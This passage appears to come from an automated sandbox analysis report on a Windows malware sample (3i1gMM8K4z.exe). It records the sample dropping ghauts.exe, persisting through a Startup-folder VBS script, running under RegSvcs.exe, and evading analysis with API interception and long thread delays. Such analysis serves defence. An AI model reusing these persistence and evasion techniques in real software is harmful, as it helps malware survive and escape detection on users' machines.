                Source: Binary string: wntdll.pdbUGP source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: 3i1gMM8K4z.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 3i1gMM8K4z.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 3i1gMM8K4z.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 3i1gMM8K4z.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 3i1gMM8K4z.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE4B37 LoadLibraryA,GetProcAddress, 0_2_00EE4B37
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4848F push FFFFFF8Bh; iretd 0_2_00F48491
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0E70F push edi; ret 0_2_00F0E711
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0E828 push esi; ret 0_2_00F0E82A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F08945 push ecx; ret 0_2_00F08958
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0EAEC push edi; ret 0_2_00F0EAEE
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0EA03 push esi; ret 0_2_00F0EA05
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_0059C4C6 push A30059BAh; retn 0059h 1_2_0059C50D
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F848F push FFFFFF8Bh; iretd 1_2_005F8491
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BE70F push edi; ret 1_2_005BE711
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BE828 push esi; ret 1_2_005BE82A
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005B8945 push ecx; ret 1_2_005B8958
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BEA03 push esi; ret 1_2_005BEA05
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BEAEC push edi; ret 1_2_005BEAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040BB97 push dword ptr [ecx-75h]; iretd 2_2_0040BBA3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeFile created: C:\Users\user\AppData\Local\Okeghem\ghauts.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe Code function: 0_2_00EE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00EE48D7
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe Code function: 0_2_00F65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00F65376
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Code function: 1_2_005948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_005948D7
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Code function: 1_2_00615376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00615376
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe Code function: 0_2_00F03187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F03187
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe API/Special instruction interceptor: Address: 105885C
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe API/Special instruction interceptor: Address: 1B88004
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599764
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599655
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599544
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598969
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598735
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598485
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598235
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597985
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597201
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597072
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596482
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595483
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594544
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593985
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
